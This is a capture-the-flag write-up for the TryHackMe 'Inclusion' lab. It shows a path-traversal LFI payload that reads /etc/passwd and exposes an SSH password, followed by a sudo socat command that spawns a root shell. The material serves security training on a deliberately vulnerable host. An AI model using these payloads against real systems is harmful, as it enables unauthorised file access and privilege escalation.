WriteUp — THM Inclusion
A beginner level LFI challenge
This is a writeup for TryHackMe room Inclusion. It teaches about local file inclusion (LFI) vulnerability.
Reconnaissance
Start by doing an nmap scan:
nmap -sC -sV -p- inclusion.thm
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-25 13:11 EET
Nmap scan report for inclusion.thm (10.10.135.218)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
| 256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelNothing special here so let’s take a look at the web server.
Web Server enumeration
Enumerating the web server from homepage we notice that there are 3 dynamic http requests:
http://inclusion.thm/article?name=hacking
http://inclusion.thm/article?name=lfiattack
http://inclusion.thm/article?name=rfiattackIf there is a LFI vulnerability, maybe these requests can be manipulated to return some unintended documents. With a lucky guess I immediately get a file from the system:
http://inclusion.thm/article?name=../../../../../../../../../../../../etc/passwdThis can be shortened to to remove the extra relative paths:
http://inclusion.thm/article?name=../../../etc/passwd/etc/password is nice since it shows all the users in the system, which is very useful in enumeration:
root:x:0:0:root:/root:/bin/bash ...
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:__REDACTED__
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/falseBut also, what is this? is that the password username pair? Let’s try to ssh in. It works! Grab the user flag and start rooting the box.
Privesc
Let’s take a look at sudo rights since we have the password and all:
sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat
Let’s take a look at socat entry on GTFOBins. There is a super easy exploit:
sudo socat stdin exec:/bin/shwhoami
root
BOOM! And we are done with this easy box.